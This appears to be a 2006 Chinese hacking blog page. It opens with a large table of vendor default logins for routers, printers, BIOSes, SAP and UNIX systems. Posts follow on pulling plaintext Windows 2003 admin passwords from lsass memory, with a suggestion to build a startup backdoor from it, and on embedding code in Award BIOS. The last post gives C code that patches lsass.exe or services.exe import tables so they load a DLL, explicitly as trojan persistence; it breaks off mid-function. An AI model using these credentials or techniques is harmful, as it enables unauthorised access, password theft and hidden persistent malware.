Osicom NETCommuter Remote Access Server Telnet Manager Manager Admin
Osicom NETCommuter Remote Access Server Telnet sysadm sysadm Admin
Osicom NETPrint 1500 E/B Telnet debug d.e.b.u.g User
Osicom NETPrint 1000E/D Telnet debug d.e.b.u.g User
Osicom NETPrint 1000E/NDS Telnet debug d.e.b.u.g User
Osicom NETPrint 1500E/N Telnet debug d.e.b.u.g User
Osicom NETPrint 2000E/N Telnet debug d.e.b.u.g User
Osicom NETPrint 1500 E/B Telnet echo echo User
Osicom NETPrint 1000E/D Telnet echo echo User
Osicom NETPrint 1000E/NDS Telnet echo echo User
Osicom NETPrint 1500E/N Telnet echo echo User
Osicom NETPrint 2000E/N Telnet echo echo User
Osicom NETPrint 1500 E/B Telnet guest guest User
Osicom NETPrint 1000E/D Telnet guest guest User
Osicom NETPrint 1000E/NDS Telnet guest guest User
Osicom NETPrint 1500E/N Telnet guest guest User
Osicom NETPrint 2000E/N Telnet guest guest User
Osicom NETPrint 1500 E/B Telnet Manager Manager Admin
Pacific Micro Data MAST 9500 Universal Disk Array ESM ver. 2.11 / 1 Console pmd (none) Admin
Packard Bell PC BIOS Console n/a bell9 Admin
PentaSafe VigilEnt Security Manager 3.0 VigilEnt Security Manager Console PSEAdmin $secure$ Admin
phoenix 4.0 6.0.2 Multi n/a admin Admin
Planet WAP-1900/1950/2000 2.5.0 Multi (none) default Admin
Prime PrimeOS Multi test test User
Prime PrimeOS Multi netlink netlink User
Prime PrimeOS Multi mfd mfd User
Prime PrimeOS Multi guest guest User
Prime PrimeOS Multi mail mail User
Prime PrimeOS Multi guest1 guest User
Prime PrimeOS Multi guest1 guest1 User
Prime PrimeOS Multi system prime Admin
Prime PrimeOS Multi system system Admin
Prime PrimeOS Multi tele tele User
Prime PrimeOS Multi prime prime User
Prime PrimeOS Multi primenet primenet User
Prime PrimeOS Multi primenet primeos User
Prime PrimeOS Multi primos_cs primos User
Prime PrimeOS Multi primos_cs prime User
Pyramid Computer BenHur all HTTP admin gnumpf Admin
QDI SpeedEasy BIOS Console n/a lesarotl Admin
QDI PC BIOS Console n/a QDI Admin
Quantex PC BIOS Console n/a teX1 Admin
Quantex PC BIOS Console n/a xljlbj Admin
Raidzone raid arrays n/a raidzone
Ramp Networks WebRamp wradmin trancell
RedHat Redhat 6.2 HTTP piranha q User
RedHat Redhat 6.2 HTTP piranha piranha User
Research PC BIOS Console n/a Col2ogro2 Admin
RM RM Connect Multi setup changeme
RM RM Connect Multi teacher password
RM RM Connect Multi temp1 password
RM RM Connect Multi admin rmnetlm
RM RM Connect Multi admin2 changeme
RM RM Connect Multi adminstrator changeme
RM RM Connect Multi deskalt password
RM RM Connect Multi deskman changeme
RM RM Connect Multi desknorm password
RM RM Connect Multi deskres password
RM RM Connect Multi guest (none)
RM RM Connect Multi replicator replicator
RM RM Connect Multi RMUser1 password
RM RM Connect Multi topicalt password
RM RM Connect Multi topicnorm password
RM RM Connect Multi topicres password
RM Server BIOS Console n/a RM
SAP SAP SAP client EARLYWATCH SUPPORT SAP internal; Mandant 066
SAP SAP SAP client SAP* 07061992 SAP internal; Mandant 066
SAP SAP SAP client SAP* PASS SAP internal; all Mandants
SAP SAP SAP client SAP* 07061992 SAP internal; Mandant 000
SAP SAP SAP client DDIC 19920706 SAP internal; Mandant 000
SAP SAP SAP client SAP* 07061992 SAP internal; Mandant 001
SAP SAP SAP client DDIC 19920706 SAP internal; Mandant 001
Semaphore PICK O/S PHANTOM
Semaphore PICK O/S DS
Semaphore PICK O/S DSA
Semaphore PICK O/S DESQUETOP
Server Technology Sentry Remote Power Manager Multi GEN1 gen1 view/control Telnet port 2001
Server Technology Sentry Remote Power Manager Multi GEN2 gen2 view/control Telnet port 2001
Server Technology Sentry Remote Power Manager Multi ADMN admn Admin Telnet port 2001
Shiva Integrator 150/200/500 Multi admin hello Admin
Shuttle PC BIOS n/a Spacve Admin
Siemens ROLM PBX eng engineer
Siemens ROLM PBX op op
Siemens ROLM PBX op operator
siemens hipath Multi n/a (none) Admin
Siemens ROLM PBX su super
Siemens PhoneMail poll tech
Siemens PhoneMail sysadmin sysadmin
Siemens ROLM PBX admin pwp
Siemens PhoneMail tech tech
Siemens Nixdorf PC BIOS Console n/a SKY_FOX Admin
Siips Trojan 8974202 Multi Administrator ganteng Admin Thx
Silicon Graphics IRIX 5.x 6.x Multi lp (none) CLI; UID lp
Silicon Graphics IRIX 5.x 6.x Multi guest (none) CLI; UID guest
Silicon Graphics IRIX Multi OutOfBox (none) Admin
Silicon Graphics IRIX Multi field field Admin
Silicon Graphics IRIX Multi tour tour Admin
Silicon Graphics IRIX Multi tutor (none) Admin
Silicon Graphics IRIX Multi tutor tutor Admin
Silicon Graphics IRIX Multi 4Dgifts 4Dgifts Admin
Silicon Graphics IRIX Multi 4Dgifts (none) Admin
Silicon Graphics IRIX Multi demos (none) Admin
Silicon Graphics IRIX Multi Ezsetup (none) Admin
SmartSwitch Router 250 ssr2500 v3.0.9 Multi admin (none) Admin
SonicWALL ALL ALL HTTP admin password Admin
Speedstream 5861 SMT Router Multi admin admin Admin
Speedstream 5871 IDSL Router Multi admin admin Admin
Speedstream Router 250 ssr250 Multi admin admin Admin
Speedstream DSL Multi admin admin Admin
SpeedXess HASE-120 Multi (none) speedxess Admin
Sun JavaWebServer 1.x 2.x AdminSrv admin admin Admin
SuperMicro PC BIOS Console n/a ksdjfg934t Admin
Sybase Adaptive Server Enterprise 11.x 12.x Multi sa (none) SA and SSO roles
Tiara Networks (router???) 1400 6100 6200 Multi n/a tiara tiaranet
Tinys PC BIOS Console n/a Tiny Admin
TMC PC BIOS Console n/a BIGO Admin
Toshiba PC BIOS Console n/a 24Banc81 Admin
Toshiba PC BIOS Console n/a Toshiba Admin
Toshiba PC BIOS Console n/a toshy99 Admin
Trend Micro Viruswall all versions HTTP on port 1812 admin admin Admin Reported by Nicolas Gregoire
TVT System Expresse G5 Multi craft (none) Admin
TVT System Expresse G5 DS1 Module Multi (none) enter Admin
UNIX Generic Multi system_admin system_admin Admin
UNIX Generic Multi trouble trouble User
UNIX Generic Multi umountfs umountfs User
UNIX Generic Multi umountfsys umountfsys User
UNIX Generic Multi umountsys umountsys User
UNIX Generic Multi unix unix User
UNIX Generic Multi user user User
UNIX Generic Multi uucp uucp User
UNIX Generic Multi uucpadm uucpadm User
UNIX Generic Multi web (none) User
UNIX Generic Multi web web User
UNIX Generic Multi webmaster webmaster User
UNIX Generic Multi webmaster (none) User
UNIX Generic Multi www (none) User
UNIX Generic Multi www www User
UNIX Generic Multi adm adm Admin
UNIX Generic Multi adm (none) Admin
UNIX Generic Multi admin admin User
UNIX Generic Multi administrator administrator User
UNIX Generic Multi administrator (none) User
UNIX Generic Multi anon anon User
UNIX Generic Multi bbs bbs User
UNIX Generic Multi bbs (none) User
UNIX Generic Multi bin sys Admin
UNIX Generic Multi bin sys Admin
UNIX Generic Multi checkfs checkfs User
UNIX Generic Multi checkfsys checkfsys User
UNIX Generic Multi checksys checksys User
UNIX Generic Multi daemon daemon User
UNIX Generic Multi daemon (none) User
UNIX Generic Multi demo demo User
UNIX Generic Multi demo (none) User
UNIX Generic Multi demos demos User
UNIX Generic Multi demos (none) User
UNIX Generic Multi dni (none) User
UNIX Generic Multi dni dni User
UNIX Generic Multi fal (none) User
UNIX Generic Multi fal fal User
UNIX Generic Multi fax (none) User
UNIX Generic Multi fax fax User
UNIX Generic Multi ftp (none) User
UNIX Generic Multi ftp ftp User
UNIX Generic Multi games games User
UNIX Generic Multi games (none) User
UNIX Generic Multi gopher gopher User
UNIX Generic Multi gropher (none) User
UNIX Generic Multi guest guest User
UNIX Generic Multi guest guestgue User
UNIX Generic Multi guest (none) User
UNIX Generic Multi halt halt User
UNIX Generic Multi halt (none) User
UNIX Generic HP-UX Multi root hp Admin
UNIX Generic Multi informix informix User
UNIX Generic Multi install install Admin
UNIX Generic Multi lp lp User
UNIX Generic Multi lp bin User
UNIX Generic Multi lp lineprin User
UNIX Generic Multi lp (none) User
UNIX Generic Multi lpadm lpadm User
UNIX Generic Multi lpadmin lpadmin User
UNIX Generic Multi lynx lynx User
UNIX Generic Multi lynx (none) User
UNIX Generic Multi mail (none) User
UNIX Generic Multi mail mail User
UNIX Generic Multi man man User
UNIX Generic Multi man (none) User
UNIX Generic Multi me (none) User
UNIX Generic Multi me me User
UNIX Generic Multi mountfs mountfs Admin
UNIX Generic Multi mountfsys mountfsys Admin
UNIX Generic Multi mountsys mountsys Admin
UNIX Generic Multi news news User
UNIX Generic Multi news (none) User
UNIX Generic Multi nobody (none) User
UNIX Generic Multi nobody nobody User
UNIX Generic Multi nuucp (none) User
UNIX Generic Multi operator operator User
UNIX Generic Multi operator (none) User
UNIX Generic Multi oracle (none) User
UNIX Generic Multi postmaster postmast User
UNIX Generic Multi postmaster (none) User
UNIX Generic Multi powerdown powerdown User
UNIX Generic Multi rje rje User
UNIX Generic Multi root root Admin
UNIX Generic Multi root (none) Admin
UNIX Generic Multi setup setup Admin
UNIX Generic Multi shutdown shutdown User
UNIX Generic Multi shutdown (none) User
UNIX Generic Multi sync sync User
UNIX Generic Multi sync (none) User
UNIX Generic Multi sys sys Admin
UNIX Generic Multi sys system Admin
UNIX Generic Multi sys bin Admin
UNIX Generic Multi sysadm sysadm Admin
UNIX Generic Multi sysadm admin Admin
UNIX Generic Multi sysadmin sysadmin Admin
UNIX Generic Multi sy**in sy**in Admin
UNIX Generic Multi system_admin (none) Admin
Verifone Verifone Junior 2.05 (none) 166816
Vextrec Technology PC BIOS Console n/a Vextrex
Vobis PC BIOS Console n/a merlin
Watch guard firebox 1000 Multi admin (none) Admin
Wim Bervoets WIMBIOSnbsp BIOS Console n/a Compleri Admin
winwork iso sistemi Multi operator (none) Admin
WorldClient AdminServer HTTP:2001 WebAdmin Admin WorldClient
WWWBoard WWWADMIN.PL HTTP WebAdmin WebBoard Admin
Wyse Winterm 5440XL Console root wyse Admin
Wyse Winterm 5440XL VNC VNC winterm VNC
Xerox Multi Function Equipment Multi admin 2222 Admin combo fax/scanner/printer with network access
Xylan Omniswitch Telnet admin switch Admin
Xylan Omniswitch Telnet diag switch
Xyplex Routers Port 7000 n/a system Admin
Xyplex Terminal Server Port 7000 n/a access User
Xyplex Terminal Server Port 7000 n/a system Admin
Xyplex Routers Port 7000 n/a access User
Zenith PC BIOS Console n/a 3098z Admin
Zenith PC BIOS Console n/a Zenith Admin
ZEOS PC BIOS Console n/a zeosx Admin
Zyxel Generic Routers Telnet n/a
3COM CoreBuilder 7000/6000/3500/2500 Telnet debug synnet

发表于 @ 2006年04月15日 6:59 PM | 评论 (0)

获取win2k3的密码

    摘要:

其实这个方法比较早就发现了,在参加安全焦点峰会之前我写的那一篇关于从内存中抓取密码一文中提到了这个(后来冰哥给面子,做为了备选议题)。当时也是很无心,发现在lsass进程中存放着最近一次登陆的管理员的密码,而且是明文的。不过在其他系统上并没有找到,所以当时也没有发表出来。今天看到WinEggDrop贴出了代码,写的非常完整,转了过来,大家看看吧。
这里面有一点要注意,首先保存的密码是最近一次登陆的用户的密码,相对于“LocalSystem Remote Procedure Call (RPC)"的一定偏移处,WinEggDrop兄弟从这后面找到“02 00 00 00 00 00 00",然后之后的UNICODE数据就是明文的密码。在lsass进程中通常有两个地方有”LocalSystem Remote Procedure Call (RPC)“。但是密码只有第一处有。
其次,如果想做为一个偷密码的后门的话,就做个程序加入到启动项,在执行时肯定就是当前登陆用户的密码, ^_^

再次感谢    (全文共16243字)——点击此处阅读全文

发表于 @ 2006年04月15日 6:58 PM | 评论 (0)

[转贴]在BIOS中嵌入应用程序的方法及实现
一种在BIOS中嵌入应用程序的方法及实现

介绍
本文针对Award公司开发的计算机系统BIOS提出了一种嵌入应用程序的方法,其基本原理对别的品牌的BIOS也一样适用,仅需稍加修改。文中作者给出并讨论一个完整的例子程序,该程序已经通过实验验证。

一. BIOS简述
这里所讲的BIOS是指计算机主板上的BIOS,是整个计算机的关键和灵魂,计算机一启动就是执行BIOS程序,它负责加电自检,初始化计算系统,响应用户对系统配置的修改,记录数据到CMOS中,将常驻程序库(Runtime Program)常驻于内存中,提供给系统和应用程序调用,经过一系列复杂操作后,最后将控制权转移给操作系统。
一开始BIOS容量仅有8K,随着计算机复杂程度的提高,以及即插即用、高级电源管理等方面的需要,再加上个别主板厂商添加的辅助功能,BIOS容量迅速增大,目前通常主板上BIOS容量为256Kb,有些已经达到512Kb,这些BIOS中常常还会有几十Kb的剩余空间,而且由于BIOS多采用FlashRom作为存储芯片,便于修改,这就为我们在BIOS中嵌入自己的程序提供了便利。
在BIOS中嵌入程序具有多方面的应用,有些主板厂商在BIOS中嵌入杀毒程序,硬盘恢复精灵,超频工具等,提高了产品的竞争力;台湾威胜公司和Elegent公司联合开发出了嵌入在BIOS中的小型浏览器操作系统,整个BIOS大小仅有512Kb,计算机无需硬盘即可上网冲浪;有些监控系统由于功能简单,完全可以把程序做到BIOS中,一开机就自动运行,既提高了可靠性,又降低了成本。另一方面,将病毒嵌入到BIOS中,一开机就常驻内存也完全可以做到。
BIOS代码虽短,但技术含量相当高,全世界仅有AWARD、PHOENIX、AMI、ACER等几家公司有研发BIOS系统的能力(AWARD 已被PHOENIX收购),其他主板厂商有的是直接购买,有的也会在以上几家公司提供的平台上进行少量功能扩展。作为个别应用的场合,就要完全靠自己对BIOS进行改造。

二. 嵌入程序的基础知识
在进行工作前需要几个必备的工具,一个是AWARD公司的BIOS刷新工具AwdFlash;另一个是Award BIOS 察看修改工具Cbrom;还有一个是MicroSoft 的汇编工具Masm6.11;最后是作者推荐的二进制文本编辑器HexWorkshop,这些工具都可以从网上下载,下面假定读者已经熟练使用这些工具,具体操作步骤不再详述。
前面提到BIOS程序是存放在FlashROM芯片中的,实际上它是经过压缩后再存放进去的,仅留下少量启动代码和解压缩程序保持原样,BIOS的执行过程其实相当复杂,好在我们无需去了解其中的详细流程,但有一点应当清楚,BIOS程序实际上也是采用的模块化设计思想,用Cbrom可以察看到BIOS中各个子模块的名称,性质,压缩率等信息,BIOS在执行过程中会将这些模块解压缩到内存中,验证模块的合法性和正确性,如果满足条件,就会转到模块的入口处执行。这里面的详细机制和由来需要参考PNPBIOS协议、PNPISA协议、PCI总线协议和EISA总线协议,内容繁多,本文不拟做深入探讨。
BIOS中有一种模块是ISA模块,来源于ISA协议,由于ISA协议属于早期的协议,内容相对简单,BIOS对ISA模块的验证也较为简单,容易满足,我们可以将自己的程序做成ISA模块挂到BIOS中,这样机器一启动,我们的程序就会启动,而且我们程序的运行是先于操作系统的。
三. 程序设计详细步骤
1. 设计准备
由于系统固有的限制,BIOS中每个模块的大小不能超过64Kb,这里是指没有压缩前的大小,这和DOS下COM程序的限制很相似,实际上我们在用MASM6.11进行编程时的确采用是COM程序的模板,由编译器生成COM文件。然而它又和一般的COM文件具有以下几点不同:
1. 首先它有自己的堆栈段,堆栈大小默认为1K,而COM文件的堆栈是在64K之内的,默认是从段内偏移量0FFFEh处开始。
2. COM文件一开始就是执行代码,而模块一开始是模块头,储存有与模块相关的信息。模块执行代码的入口点在模块中的某一处。
3. COM文件执行完后返回到操作系统,通常通过子功能号4ch的中断INT21h返回到DOS,而模块是远程调用返回,也就是说必须用RETF返回。
4. ISA模块最后一个字节是校验码,所有的字节相加必须为0,BIOS利用这点来验证一个ISA模块的正确性。COM文件没有这点要求。
5. COM文件执行时是先被完整地复制到段内偏移量100h处,然后再执行,而模块的段内偏移量不能确定,有的模块会是0。所以涉及到段内偏移量的汇编指令,如LEA、OFFSET要谨慎使用。
下表是ISA模块头的格式,其中仅列出了几个最基本的相关字段,这是协议中的内容,我们在编写模块头时,需要严格遵循下表的格式:

偏移 长度 值 说明
0h 1 55h 模块标签字节1
1h 1 AAh 模块标签字节2
2h 1 * 模块长度(以512字节为单位)
3h 3 * 入口点,BIOS对此位置做远调用,这里往往放一条跳转指令
6h~19h 20 * 保留

表一 模块头格式
通常一个BIOS嵌入程序设计的基本流程如下,每一步都很关键,有必要给出详细说明:
1. 首先用汇编编写DOS下的COM程序,必须注意到程序是先于操作系统执行的,所以程序中不能调用任何DOS的中断服务。为了程序转化方便,也不要用.code,.startup等汇编伪指令,尽量采用早期的汇编编写方式,争取对整个程序结构的完全控制。
2. 调试通过后,在COM文件前加上文件头,改变返回指令为RETF,控制文件大小为512字节的整数倍,重新编译生成COM文件。
3. 在HexWorkshop中调入刚生成的COM文件,利用其中的checksum工具生成文件的校验码,用100h减去该8位校验码后填入文件最后一个字节。再次生成文件的校验码,确认为零。
4. 用Cbrom将文件作为ISA模块嵌入到BIOS中,在本文中的操作为 “Cbrom save.bin/isa hello.com”,其中save.bin是事先用AwdFlash备份的BIOS文件。注意反复操作时,要先将前一个给释放掉,操作为“Cbrom save.bin/isa release”。
5. 用AwdFlash将新的BIOS文件烧录到FlashROM中。重启计算机,检验程序。
进行以上实验前,最好自备编程器,万一计算机不能正常启动,也可以重新恢复BIOS,如果可以用本身具有双BIOS保护功能的计算机进行实验则更加保险。
下面设计两个简单的Hello程序,分别采用了两种不同的方式,两个程序都是在屏幕上显示一行字“Hello!Press F1 to continue…”,当按下F1功能键后,程序退出,计算机继续启动。
2. Hello程序一
下面给出的源代码是在上面流程2中的文件,所以已经添加了文件头,编译后生成的COM文件是不能在DOS下执行的,请读者务必注意。另外由于程序功能简单,所以在这里文件大小限制为512字节,对不同规模的程序,会有一些小小的变动。程序中所有的中断调用都是BIOS中断服务调用,具体调用规则不做详细说明,请读者查阅有关资料。
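;Hello source program 1 -- an ISA option-ROM module, NOT a runnable DOS COM file.
;Layout: 26-byte module header (signature, length, entry jump, reserved area),
;then the code, a NUL-terminated string, and the checksum byte at offset 511.
;All data references assemble DS-relative (assume ds:code) and the module never
;loads DS itself, so it relies on the BIOS entering with DS == CS -- confirm.
code segment
assume cs:code,ds:code
start:

signature db 55h,0aah       ;option-ROM signature bytes 55h AAh
comlength db 01h            ;module length in 512-byte units (1 => 512 bytes)
jmp near ptr begin0         ;entry point at offset 3: the BIOS far-calls here
reserved db 20 dup(?)       ;offsets 6h..19h are reserved

begin0:

mov di,25                   ;DI tracks the current column (starts at 25)
mov ah,2                    ;INT 10h/AH=2: set cursor position
mov bh,0                    ;display page 0
mov dx,di                   ;DL = column
mov dh,10                   ;DH = row 10
int 10h                     ;cursor to row 10, column 25

mov si,offset string        ;SI -> string to display
;when debugging under DOS add "add si,100h" here (COM files load at offset 100h)
showstr:
mov ah,9                    ;INT 10h/AH=9: write character + attribute at cursor
mov al,[si]                 ;AL = next character
and al,0ffh                 ;sets ZF when AL == 0 (string terminator)
jz kbinput
mov bh,0                    ;display page 0
mov bl,0DAh                 ;attribute byte (background/foreground colours)
mov cx,1                    ;write the character once
int 10h
inc si                      ;advance to the next character -- without this the
                            ;loop re-reads the same byte and never terminates
mov ah,2                    ;move the cursor one column to the right
mov bh,0
inc di
mov dx,di
mov dh,10
int 10h
jmp showstr                 ;loop until the terminator is reached

kbinput:
mov ah,0                    ;INT 16h/AH=0: wait for a keystroke
int 16h
cmp ah,3bh                  ;scan code 3Bh = F1
jne kbinput                 ;any other key: keep waiting

mov ax,0                    ;return value handed back to the BIOS
retf                        ;the BIOS called us far, so return far

string db 'Hello! Press F1 to continue...',00h ;00h terminates the string
org 511                     ;last byte of the 512-byte module
checksum db ?               ;filled in by hand so all 512 bytes sum to zero
code ends
end start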

将上述程序烧入BIOS中运行时,在第一屏信息显示过后,会在第二屏正中央显示一条红底白字的信息,提示按F1键继续,按F1键后,BIOS继续下面的启动步骤。显示第三屏启动信息,即原先的第二屏信息,最后加载操作系统。
以上程序假定了BIOS会将模块解压至段首运行,事实也确是如此,但由于没查到相关资料,目前还不能肯定总会如此。这一点将在下一个Hello程序中有所改进。
3. Hello程序二
Hello程序一在BIOS没有初始化完全的时候即进入运行,所以对程序功能有更多限制,有些BIOS中断服务还不具备,任何对这些服务的调用都会产生意想不到的结果。考虑到BIOS在加载操作系统时实际上是用的INT 19h,Hello程序二就利用挂钩19h中断的方法抢在操作系统之前,BIOS初始化之后运行,这样就可以完整地利用整个计算机系统的所有资源了。
另外必须指出的是,模块本身有责任保持整个模块的校验和为零,也就是说,ISA模块进驻内存中后就不能卸出,BIOS会在模块返回后检查整个模块的检验和,判断模块的正确性,如果错误,则会死机。模块在初始运行时可以更改自己段内的数据,而在BIOS初始化完毕后,模块就不能再有改变自身数据的操作。
;Hello source program 2 -- ISA option-ROM module that hooks INT 19h so the
;message is shown after BIOS initialisation, just before the OS is loaded.
;Layout matches program 1: 26-byte header, code, data, checksum at offset 511.
;NOTE(review): data references such as "mov saveip,ax" assemble DS-relative
;(assume ds:code), yet begin0 never loads DS with CS (begin1 does); this
;relies on the BIOS entering the module with DS == CS -- confirm.
.model tiny
.386
code segment
assume cs:code,ds:code
start:
signature db 55h,0aah ;option-ROM signature bytes 55h AAh
comlength db 01h ;module length in 512-byte units (1 => 512 bytes)
jmp near ptr begin0 ;entry point at offset 3, far-called by the BIOS
reserved db 20 dup(?) ;offsets 6h..19h are reserved
begin0:
call getip ;compute the module's starting offset within the segment
;(stored in ipstart) so absolute "offset" values can be relocated
mov ax,0 ;hook INT 19h: its vector lives at 0000:0064h
mov es,ax ;save the original handler into
mov ax,es:[64h] ;saveip and savecs
mov saveip,ax
mov ax,es:[66h]
mov savecs,ax
mov ax,offset begin1 ;new handler = begin1, relocated by ipstart
add ax,ipstart
mov es:[64h],ax
mov es:[66h],cs

mov ax,0 ;recompute the checksum: the saves above changed bytes inside the module
mov si,510 ;walk offsets 510..0 -- do not include the last byte (offset 511) itself;
again: add ax,cs:[si] ;AL ends up as the byte sum of offsets 0..510 mod 256 (AH,
dec si ;which also absorbs byte 511 from the word read at 510, is discarded)
jns again
neg al ;store the byte that makes the sum of all 512 bytes zero,
mov checksum,al ;because the BIOS re-verifies the module checksum after we return

mov ax,0
retf ;far return to the BIOS

begin1: ;INT 19h handler entry
sti ;enable interrupts
pusha
push es
push ds ;preserve the caller's registers

mov ax,cs
mov ds,ax ;DS = CS so data labels resolve inside this module

mov ax,0 ;restore the original INT 19h vector
mov es,ax
mov ax,saveip
mov es:[64h],ax
mov ax,savecs
mov es:[66h],ax
;the display / keyboard part is essentially the same as program 1
;and is omitted here ("...") to save space
;...
mov si,offset string
add si,ipstart ;note: relocate the string's offset by the module's start offset
;...
pop ds
pop es
popa
int 19h ;chain to the original bootstrap loader
iret

getip proc ;find the module's starting offset within the segment:
pop ax ;the return address pushed by "call getip" lies
push ax ;header (26 bytes) + 3-byte call = 29 bytes past the start
sub ax,29 ;29 = header size plus 3
mov ipstart,ax
ret
getip endp

string db 'Hello! Press F1 to continue...',00h

saveip dw ? ;original INT 19h offset
savecs dw ? ;original INT 19h segment
ipstart dw ? ;offset of the module's first byte within CS

org 511
checksum db ? ;last byte, keeps the 512-byte sum at zero

code ends
end start

Hello2程序在执行时,会在第二屏启动画面的最后一行显示一段黑底白字“Hello! Press F1 to continue...”,当按下F1后,计算机就开始加载操作系统。
需要注意的是,在DOS或Windows下调试Hello程序二时,是不能用19h中断的,任何对19h中断的调用要么结束当前程序,要么会造成死机,所以调试时需要暂时用别的中断代替,如保留中断2bh,当调试成功以后,再将中断改回为19h。
另一个在Hello1与Hello2程序中都要注意的问题是,在程序中不要轻易改动模块头的模块长度字节的值,PCI模块支持并赞成这样的改动,而ISA模块没找到相关资料,笔者曾尝试过改动这一值,结果导致Windows98不能进入通常模式。
四. 结束语
在编程实践中作者感到编写BIOS的嵌入程序具有相当难度,它需要有扎实的汇编语言功底和对计算机硬件系统的深入了解,更需要在实践中不断地摸索BIOS程序的特点,只有这样才能够编写出精悍的代码,满足实践应用的需要。

发表于 @ 2006年04月13日 11:23 PM | 评论 (0)

修改导入表载入DLL
关于修改EXE文件的导入表,实际上是一个很古老的话题了(如果您是此中高手,请不要在这篇文章浪费时间了,如果您发现了其中的问题,还请多多指教).一些PE相关的软件,也都实现了这样的功能,例如Stud_PE.
Stud_PE通过添加一个新节并将导入表连同添加的内容一并复制到新节的方法来实现对DLL的导入.
使用这样的方法只要是PE格式的EXE文件,都可以实现导入DLL的功能,但此方法,实现了通用性,却增加了文件的大小.
对于存放在磁盘上PE文件,其中存在着大量的空隙,我们知道PE中的数据是按照一定的文件对齐来组织.IMAGE_OPTIONAL_HEADER结构中的FileAlignment成员保存着文件对齐的大小,这个成员是在链接的时候由链接器指定,如果使用VC来编写程序,可以使用link中的/filealign来调整文件对齐的大小.
这里,就是利用这些空隙来使EXE在启动时载入DLL(类似于一些病毒的技术),同时并不改变文件的大小.如何实现?还是要修改导入表.然而这种方法的缺点也是很明显的,并不是每个EXE都有足够的空间让我们来插入数据,按照我的测试,在Windows 2003 Enterprise sp1中,lsass.exe以及services.exe都是有足够的空间进行插入,而在Windows 2000 Advance Server sp4中,lsass.exe无法插入,services.exe可以插入.这些EXE文件的FileAlignment为0x200H.为什么选择这些exe文件?说到这里我的意图已经很明显了,黑客之门便是利用这种方法实现自启动的木马.
上面说了堆废话,现在直接贴上代码,具体实现请见程序的注释.这里假定您对PE格式有一定的了解.

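//
// Copy from Matt Pietrek
// Given an RVA, look up the section header that encloses it and return a
// pointer to its IMAGE_SECTION_HEADER
//
// Parameters:
//   rva       - relative virtual address to locate
//   pNTHeader - the image's IMAGE_NT_HEADERS; NULL yields NULL
// Returns the enclosing section header, or NULL when no section covers rva.
//
// Note: FileHeader.NumberOfSections is read straight from the file being
// parsed, so on a malformed image the walk over the section table can run
// past the mapped data; callers handling untrusted files should validate the
// section count against the mapping size before calling this.
//
PIMAGE_SECTION_HEADER
GetEnclosingSectionHeader(
DWORD rva,
PIMAGE_NT_HEADERS pNTHeader
)
{
    if (pNTHeader == NULL)
        return NULL;

    PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION32(pNTHeader);

    for (unsigned i = 0; i < pNTHeader->FileHeader.NumberOfSections; i++, section++)
    {
        // Is the RVA within this section?  Written as a subtraction so that
        // VirtualAddress + VirtualSize cannot wrap around 32 bits on a hostile
        // header; for well-formed sections this is the same test as
        // (rva >= VirtualAddress && rva < VirtualAddress + VirtualSize).
        if ((rva - section->VirtualAddress) < section->Misc.VirtualSize)
            return section;
    }

    return NULL;
}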


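// Write exactly `len` bytes at the current file position.
// Returns 0 on success; on a failed or short write it logs `what` together
// with GetLastError() and returns -1.
static int
WriteChecked(HANDLE hFile, const void *data, DWORD len, const char *what)
{
    DWORD dwBytesWritten = 0;

    if (!WriteFile(hFile, (PVOID)data, len, &dwBytesWritten, NULL) ||
        dwBytesWritten != len)
    {
        fprintf(stderr, "WriteFile(%s) failed. --err: %lu\n", what, GetLastError());
        return -1;
    }
    return 0;
}

// Move the file pointer to the absolute offset `lOffset`.
// Returns 0 on success, -1 (logged) when SetFilePointer reports failure.
static int
SeekTo(HANDLE hFile, long lOffset, const char *what)
{
    if (SetFilePointer(hFile, lOffset, NULL, FILE_BEGIN) == (DWORD)-1)
    {
        fprintf(stderr, "SetFilePointer(%s) failed. --err: %lu\n", what, GetLastError());
        return -1;
    }
    return 0;
}

// Add an import of Startup() from test.dll to the PE image whose file is
// open on hFile and whose headers are mapped at dwBase.
//
// hFile     - handle to the target file, opened for writing
// dwBase    - address of the mapped copy of the file (headers are read from it)
// pNTHeader - IMAGE_NT_HEADERS inside that mapping
//
// Returns 0 on success, -1 on failure (a message is written to stderr).
//
// The import table's RVA is taken from
// OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]; the section
// that contains it gives Offset = VirtualAddress - PointerToRawData, so a
// file offset in that section maps to RVA = offset + Offset. The new data is
// appended after the section's used bytes, at file offset
// dwEndOfRawDataAddr = PointerToRawData + VirtualSize, in this layout:
//
//   [dll name\0][hint WORD][function name\0]          nTotal bytes
//   [thunk RVA -> hint][0]                             8 bytes
//   [new descriptor][original descriptors][zero descriptor]
//
// and the import directory is pointed at the descriptor array, the section's
// VirtualSize grown by the appended length.
//
// Fixes relative to the first version of this routine: the descriptor array
// now ends in a zero descriptor (previously the loader read whatever followed
// the last copied entry), every write is checked, and the heap buffer is
// freed on all exit paths.
//
// NOTE(review): the file is patched in place and a write can fail after
// earlier ones succeeded, so on error the target may be half-patched - run
// this on a copy. The descriptor walk is bounded only by the terminator it
// finds, so a truncated or malformed import table can read past the mapping;
// there is no file-size parameter to check against. The pointer-minus-dwBase
// arithmetic assumes a 32-bit build. The new thunk doubles as the IAT slot
// and lies outside any existing IMAGE_DIRECTORY_ENTRY_IAT range; if the
// loader only makes that range writable while resolving imports, images
// whose IAT directory points into a read-only section will fault at load -
// a likely cause of the "some EXEs no longer run" remark in the article.
// Not addressed here.
int
AddImportDll(
HANDLE hFile,
DWORD dwBase,
PIMAGE_NT_HEADERS pNTHeader
)
{
    const char szDll[] = "test.dll";     // imported DLL; resolved by the loader's search order
    const char szFunc[] = "Startup";     // function imported by name
    const WORD Hint = 0;                 // IMAGE_IMPORT_BY_NAME.Hint, 0 = no hint
    const DWORD dwDescSize = sizeof(IMAGE_IMPORT_DESCRIPTOR);   // 20 bytes
    PIMAGE_IMPORT_DESCRIPTOR pImportDesc = 0;
    PIMAGE_IMPORT_DESCRIPTOR pImportDescVector = NULL;
    PIMAGE_SECTION_HEADER pSection = 0;
    IMAGE_IMPORT_DESCRIPTOR Add_ImportDesc;
    DWORD dwImportRva = 0;
    DWORD dwEndOfRawDataAddr = 0;
    DWORD dwBuffer = 0;
    long lDistanceToMove = 0;
    int Offset = -1;
    int nImportDllCount = 0;
    int nDllNameLen = 0;
    int nFuncNameLen = 0;
    int nTotal = 0;
    int nTotalLen = 0;
    int nRet = -1;   // result; every failure after the allocation jumps to cleanup

    //
    // Locate the section holding the import table and derive the
    // RVA -> file-offset delta for it.
    //
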